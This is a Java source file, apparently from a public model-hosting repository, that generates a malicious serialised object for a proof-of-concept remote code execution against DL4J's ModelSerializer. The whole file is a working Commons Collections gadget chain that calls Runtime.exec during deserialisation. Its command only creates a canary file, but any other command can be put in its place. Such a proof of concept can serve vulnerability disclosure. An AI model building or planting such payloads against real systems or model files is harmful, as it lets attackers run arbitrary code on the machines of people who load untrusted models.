dl4j-modelserializer-rce-poc / BuildMaliciousModel.java
krishprober's picture
DL4J ModelSerializer deserialization RCE PoC (preprocessor.bin)
db9ffe9
Raw
History Blame Contribute Delete
1.45 kB
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.*;
import org.apache.commons.collections.map.LazyMap;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import java.io.*; import java.lang.reflect.*; import java.util.*;
public class GadgetGen3 {
public static void main(String[] a) throws Exception {
String out=a[0]; String[] cmd={"touch","/tmp/DL4J_RCE_CANARY"};
Transformer[] t={ new ConstantTransformer(Runtime.class),
new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",new Class[0]}),
new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,new Object[0]}),
new InvokerTransformer("exec", new Class[]{String[].class}, new Object[]{cmd}) };
Transformer chain=new ChainedTransformer(t);
Map lazyMap=LazyMap.decorate(new HashMap(), new ConstantTransformer(1));
TiedMapEntry entry=new TiedMapEntry(lazyMap,"foo");
HashMap<Object,Object> map=new HashMap<>(); map.put(entry,"bar");
lazyMap.remove("foo");
Field f=LazyMap.class.getDeclaredField("factory"); f.setAccessible(true); f.set(lazyMap, chain);
ByteArrayOutputStream b=new ByteArrayOutputStream(); new ObjectOutputStream(b).writeObject(map);
java.nio.file.Files.write(new File(out).toPath(), b.toByteArray());
System.out.println("cc3 gadget written ("+b.size()+" bytes)");
}
}